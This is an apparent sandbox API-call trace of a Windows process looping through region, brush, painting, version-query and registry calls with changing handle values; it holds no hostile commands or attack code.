0x10409be [0017.510] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409bf [0017.510] CombineRgn (hrgnDst=0x10409be, hrgnSrc1=0x2040713, hrgnSrc2=0xf804027d, iMode=1) returned 1 [0017.510] CombineRgn (hrgnDst=0x10409bf, hrgnSrc1=0x2040713, hrgnSrc2=0xf804027d, iMode=4) returned 2 [0017.510] CreateSolidBrush (color=0xff) returned 0x21009bd [0017.510] CreateSolidBrush (color=0xff0000) returned 0x11009c0 [0017.510] DeleteObject (ho=0x11009c0) returned 1 [0017.510] DeleteObject (ho=0xf804027d) returned 1 [0017.510] DeleteObject (ho=0x2040713) returned 1 [0017.511] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.511] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.511] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.511] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.511] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.511] BeginPath (hdc=0x0) returned 0 [0017.511] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.511] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.511] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.511] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.511] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.511] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.511] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.511] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.511] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf904027d [0017.511] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3040713 [0017.511] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c1 [0017.511] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c2 [0017.511] CombineRgn (hrgnDst=0x10409c1, hrgnSrc1=0xf904027d, hrgnSrc2=0x3040713, iMode=1) returned 1 [0017.511] CombineRgn (hrgnDst=0x10409c2, hrgnSrc1=0xf904027d, hrgnSrc2=0x3040713, iMode=4) returned 2 [0017.511] CreateSolidBrush (color=0xff) returned 0x21009c0 [0017.512] CreateSolidBrush (color=0xff0000) returned 0x11009c3 [0017.512] DeleteObject (ho=0x11009c3) returned 1 [0017.512] DeleteObject (ho=0x3040713) returned 1 [0017.512] DeleteObject (ho=0xf904027d) returned 1 [0017.512] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.512] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.512] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.512] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.512] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.512] BeginPath (hdc=0x0) returned 0 [0017.512] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.512] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.512] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.512] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.512] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.512] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.512] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.512] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.512] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4040713 [0017.512] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfa04027d [0017.512] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c4 [0017.512] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c5 [0017.512] CombineRgn (hrgnDst=0x10409c4, hrgnSrc1=0x4040713, hrgnSrc2=0xfa04027d, iMode=1) returned 1 [0017.512] CombineRgn (hrgnDst=0x10409c5, hrgnSrc1=0x4040713, hrgnSrc2=0xfa04027d, iMode=4) returned 2 [0017.512] CreateSolidBrush (color=0xff) returned 0x21009c3 [0017.512] CreateSolidBrush (color=0xff0000) returned 0x11009c6 [0017.512] DeleteObject (ho=0x11009c6) returned 1 [0017.512] DeleteObject (ho=0xfa04027d) returned 1 [0017.512] DeleteObject (ho=0x4040713) returned 1 [0017.512] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.512] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.513] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.513] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.513] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.513] BeginPath (hdc=0x0) returned 0 [0017.513] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.513] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.513] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.513] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.513] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.513] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.513] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.513] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.513] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfb04027d [0017.513] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5040713 [0017.513] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c7 [0017.513] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409c8 [0017.513] CombineRgn (hrgnDst=0x10409c7, hrgnSrc1=0xfb04027d, hrgnSrc2=0x5040713, iMode=1) returned 1 [0017.513] CombineRgn (hrgnDst=0x10409c8, hrgnSrc1=0xfb04027d, hrgnSrc2=0x5040713, iMode=4) returned 2 [0017.513] CreateSolidBrush (color=0xff) returned 0x21009c6 [0017.513] CreateSolidBrush (color=0xff0000) returned 0x11009c9 [0017.513] DeleteObject (ho=0x11009c9) returned 1 [0017.513] DeleteObject (ho=0x5040713) returned 1 [0017.513] DeleteObject (ho=0xfb04027d) returned 1 [0017.513] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.513] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.513] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.513] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.514] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.514] BeginPath (hdc=0x0) returned 0 [0017.514] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.514] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.514] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.514] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.514] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.514] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.514] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.514] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.514] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6040713 [0017.514] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfc04027d [0017.514] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ca [0017.514] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409cb [0017.514] CombineRgn (hrgnDst=0x10409ca, hrgnSrc1=0x6040713, hrgnSrc2=0xfc04027d, iMode=1) returned 1 [0017.514] CombineRgn (hrgnDst=0x10409cb, hrgnSrc1=0x6040713, hrgnSrc2=0xfc04027d, iMode=4) returned 2 [0017.514] CreateSolidBrush (color=0xff) returned 0x21009c9 [0017.514] CreateSolidBrush (color=0xff0000) returned 0x11009cc [0017.514] DeleteObject (ho=0x11009cc) returned 1 [0017.514] DeleteObject (ho=0xfc04027d) returned 1 [0017.514] DeleteObject (ho=0x6040713) returned 1 [0017.514] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.514] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.514] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.514] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.514] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.514] BeginPath (hdc=0x0) returned 0 [0017.514] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.515] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.515] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.515] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.515] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.515] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.515] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.515] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.515] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfd04027d [0017.515] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7040713 [0017.515] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409cd [0017.515] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ce [0017.515] CombineRgn (hrgnDst=0x10409cd, hrgnSrc1=0xfd04027d, hrgnSrc2=0x7040713, iMode=1) returned 1 [0017.515] CombineRgn (hrgnDst=0x10409ce, hrgnSrc1=0xfd04027d, hrgnSrc2=0x7040713, iMode=4) returned 2 [0017.515] CreateSolidBrush (color=0xff) returned 0x21009cc [0017.515] CreateSolidBrush (color=0xff0000) returned 0x11009cf [0017.515] DeleteObject (ho=0x11009cf) returned 1 [0017.515] DeleteObject (ho=0x7040713) returned 1 [0017.515] DeleteObject (ho=0xfd04027d) returned 1 [0017.515] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.515] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.515] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.515] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.515] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.515] BeginPath (hdc=0x0) returned 0 [0017.515] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.515] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.515] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.515] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.516] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.516] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.516] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.516] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.516] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8040713 [0017.516] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfe04027d [0017.516] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d0 [0017.516] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d1 [0017.516] CombineRgn (hrgnDst=0x10409d0, hrgnSrc1=0x8040713, hrgnSrc2=0xfe04027d, iMode=1) returned 1 [0017.516] CombineRgn (hrgnDst=0x10409d1, hrgnSrc1=0x8040713, hrgnSrc2=0xfe04027d, iMode=4) returned 2 [0017.516] CreateSolidBrush (color=0xff) returned 0x21009cf [0017.516] CreateSolidBrush (color=0xff0000) returned 0x11009d2 [0017.516] DeleteObject (ho=0x11009d2) returned 1 [0017.516] DeleteObject (ho=0xfe04027d) returned 1 [0017.516] DeleteObject (ho=0x8040713) returned 1 [0017.516] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.516] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.516] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.516] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.516] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.516] BeginPath (hdc=0x0) returned 0 [0017.516] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.516] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.516] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.516] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.516] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.516] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.516] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.516] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.517] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xff04027d [0017.517] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9040713 [0017.517] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d3 [0017.517] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d4 [0017.517] CombineRgn (hrgnDst=0x10409d3, hrgnSrc1=0xff04027d, hrgnSrc2=0x9040713, iMode=1) returned 1 [0017.517] CombineRgn (hrgnDst=0x10409d4, hrgnSrc1=0xff04027d, hrgnSrc2=0x9040713, iMode=4) returned 2 [0017.517] CreateSolidBrush (color=0xff) returned 0x21009d2 [0017.517] CreateSolidBrush (color=0xff0000) returned 0x11009d5 [0017.517] DeleteObject (ho=0x11009d5) returned 1 [0017.517] DeleteObject (ho=0x9040713) returned 1 [0017.517] DeleteObject (ho=0xff04027d) returned 1 [0017.517] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.517] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.517] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.517] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.517] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.517] BeginPath (hdc=0x0) returned 0 [0017.517] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.517] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.517] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.517] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.517] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.517] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.517] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.517] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.517] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa040713 [0017.517] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4027d [0017.517] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d6 [0017.517] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d7 [0017.517] CombineRgn (hrgnDst=0x10409d6, hrgnSrc1=0xa040713, hrgnSrc2=0x4027d, iMode=1) returned 1 [0017.517] CombineRgn (hrgnDst=0x10409d7, hrgnSrc1=0xa040713, hrgnSrc2=0x4027d, iMode=4) returned 2 [0017.518] CreateSolidBrush (color=0xff) returned 0x21009d5 [0017.518] CreateSolidBrush (color=0xff0000) returned 0x11009d8 [0017.518] DeleteObject (ho=0x11009d8) returned 1 [0017.518] DeleteObject (ho=0x4027d) returned 1 [0017.518] DeleteObject (ho=0xa040713) returned 1 [0017.518] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.518] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.518] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.518] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.518] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.518] BeginPath (hdc=0x0) returned 0 [0017.518] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.518] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.518] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.518] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.518] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.518] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.518] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.518] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.518] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x104027d [0017.518] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb040713 [0017.518] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409d9 [0017.518] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409da [0017.518] CombineRgn (hrgnDst=0x10409d9, hrgnSrc1=0x104027d, hrgnSrc2=0xb040713, iMode=1) returned 1 [0017.518] CombineRgn (hrgnDst=0x10409da, hrgnSrc1=0x104027d, hrgnSrc2=0xb040713, iMode=4) returned 2 [0017.518] CreateSolidBrush (color=0xff) returned 0x21009d8 [0017.518] CreateSolidBrush (color=0xff0000) returned 0x11009db [0017.518] DeleteObject (ho=0x11009db) returned 1 [0017.518] DeleteObject (ho=0xb040713) returned 1 [0017.518] DeleteObject (ho=0x104027d) returned 1 [0017.518] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.518] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, 